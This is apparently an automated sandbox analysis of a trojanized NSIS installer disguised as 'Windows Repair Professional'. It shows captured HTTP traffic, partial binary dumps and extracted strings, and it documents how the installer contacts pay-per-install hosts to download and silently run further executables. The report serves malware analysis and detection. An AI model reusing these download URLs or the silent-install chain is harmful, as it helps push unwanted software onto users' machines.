X-Amz-Cf-Id: z8nqj6gQgmuWKT9oAIJTJr8kmfMfy_E9gLa5dRx5WTeY2Vba9TMkZg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s...........@...........................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata...@...@...........................rsrc....@.......B...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 HTTP/1.0
Host: tap.winre.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2322
Connection: close
Date: Thu, 13 Aug 2015 00:45:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e2PKLPDCLOe9qGBiUN-s8dMvvEQm5jyb7gjuvI2-p-s-0xCQqXSOzg==
files=4.t1=dl.u1=hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%2520Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Windows%20Repair%20Professional%20%28A&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm%2Cwsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132.n2=SevenZip-apset.exe.b2=ap.c2=sevenzip.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://b.byteguardoptic.com/de/?q=YWZmaWxpYXRlX2lkPTczNS00MjcyMTMyJmZpbGVzaXplPTIuNE1iJnB1Ymxpc2hlcklkPTI0NDM3JnByb2R1Y3RfbmFtZT1XaW5kb3dzJTIwUmVwYWlyJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF90aXRsZT1XaW5kb3dzJTIwUmVwYWlyJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF9kb3dubG9hZF91cmw9aHR0cCUzYSUyZiUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=.n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://get.file136desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4272132&d2=735&dynamicname=Windows%2520Repair%20Professional%20%28A.n4=setup-1228.exe.b4=ru.c4=
<<< skipped >>>
GET /launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe HTTP/1.0
Host: get.fc-gosh.biz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 179
Connection: close
Date: Thu, 13 Aug 2015 00:45:43 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6QMHXEHuHyMgYmFpY2cxVQprTEKUWi9cTaXED_52oB9UA-kWfyWXOA==
s=first..u=hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial..
GET /?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.cp-retr.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 52212
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Thu, 13 Aug 2015 00:45:47 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qGMncVdA41NlISK5tz1w3zzoOgUy1l5m5tOFRCo78IYhdCrny4lkfQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s...........,...........................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....,...........v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
POST hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 13 Aug 2015 00:45:54 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 3abf650c7bf73e47515000bddf3f05c0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1616:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
ogram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
ogram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
.reloc
.reloc
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
System.dll
System.dll
callback%d
callback%d
KERNEL32.DLL
KERNEL32.DLL
COMDLG32.dll
COMDLG32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
MPR.dll
MPR.dll
OLEAUT32.dll
OLEAUT32.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
UxTheme.dll
UxTheme.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WSOCK32.dll
WSOCK32.dll
FtpOpenFileW
FtpOpenFileW
hXXp://VVV.usertrust.com1
hXXp://VVV.usertrust.com1
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
hXXp://ocsp.usertrust.com0
hXXp://ocsp.usertrust.com0
hXXps://secure.comodo.net/CPS0C
hXXps://secure.comodo.net/CPS0C
2hXXp://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
2hXXp://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
2hXXp://crt.comodoca.com/COMODORSACodeSigningCA.crt0$
2hXXp://crt.comodoca.com/COMODORSACodeSigningCA.crt0$
hXXp://ocsp.comodoca.com0
hXXp://ocsp.comodoca.com0
shane@tweaking.com0
shane@tweaking.com0
"COMODO RSA Certification Authority0
"COMODO RSA Certification Authority0
;hXXp://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
;hXXp://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
/hXXp://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
/hXXp://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
nsd2.tmp
nsd2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S
ram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
ram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
c:\%original file name%.exe
c:\%original file name%.exe
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201508130045
201508130045
hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
Nullsoft Install System v2.46
Nullsoft Install System v2.46
%original file name%.exe_1616_rwx_10004000_00001000:
callback%d
callback%d
NojM0TDHJX.exe_1980:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
_downloader-Q4gYjE1gv.exe
_downloader-Q4gYjE1gv.exe
instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
UyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
UyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
%d/at
%d/at
key=end
key=end
} .rdata
} .rdata
KERNEL32.DLL
KERNEL32.DLL
nsArray.dll
nsArray.dll
Join
Join
.reloc
.reloc
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
ButtonEvent.dll
ButtonEvent.dll
`.reloc
`.reloc
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
BgWorker.dll
BgWorker.dll
LangDLL.dll
LangDLL.dll
W.vS|
W.vS|
Windows Repair Professional (A Setup
Windows Repair Professional (A Setup
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
cpSetup.exe
Fbu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
Fbu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
19458637
19458637
x.exe
x.exe
staller.com/installer/?iid=324&nsoft=9
staller.com/installer/?iid=324&nsoft=9
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
NojM0TDHJX.exe
NojM0TDHJX.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
722076380
722076380
2107457
2107457
1393165021
1393165021
1124729953
1124729953
hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
iUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
iUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
0.x.exe
0.x.exe
Q4gYjE1gv.exe
Q4gYjE1gv.exe
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1.1.1.6
1.1.1.6
1.0.0.8
1.0.0.8
NojM0TDHJX.exe_1980_rwx_003D4000_00001000:
callback%d
callback%d
NojM0TDHJX.exe_1980_rwx_10001000_00007000:
/key=
/key=
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
cpSetup.exe_568:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
%Program Files%
%Program Files%
\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
$$\wininit.ini
$$\wininit.ini
@.reloc
@.reloc
subid1: %s
subid1: %s
subid2: %s
subid2: %s
subid3: %s
subid3: %s
subid4: %s
subid4: %s
subid5: %s
subid5: %s
url1: %s
url1: %s
url2: %s
url2: %s
apptitle: %S
apptitle: %S
appimgurl: %s
appimgurl: %s
appsetupurl: %s
appsetupurl: %s
appcmd: %s
appcmd: %s
apptyurl: %s
apptyurl: %s
appversion: %s
appversion: %s
Offer path: %s
Offer path: %s
Offer retruned: %s
Offer retruned: %s
hXXp://
hXXp://
Stub.dll
Stub.dll
GetProcessHeap
GetProcessHeap
nsx8.tmp
nsx8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx6.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe
:::#222.111 )))
:::#222.111 )))
Nullsoft Install System v2.46
Nullsoft Install System v2.46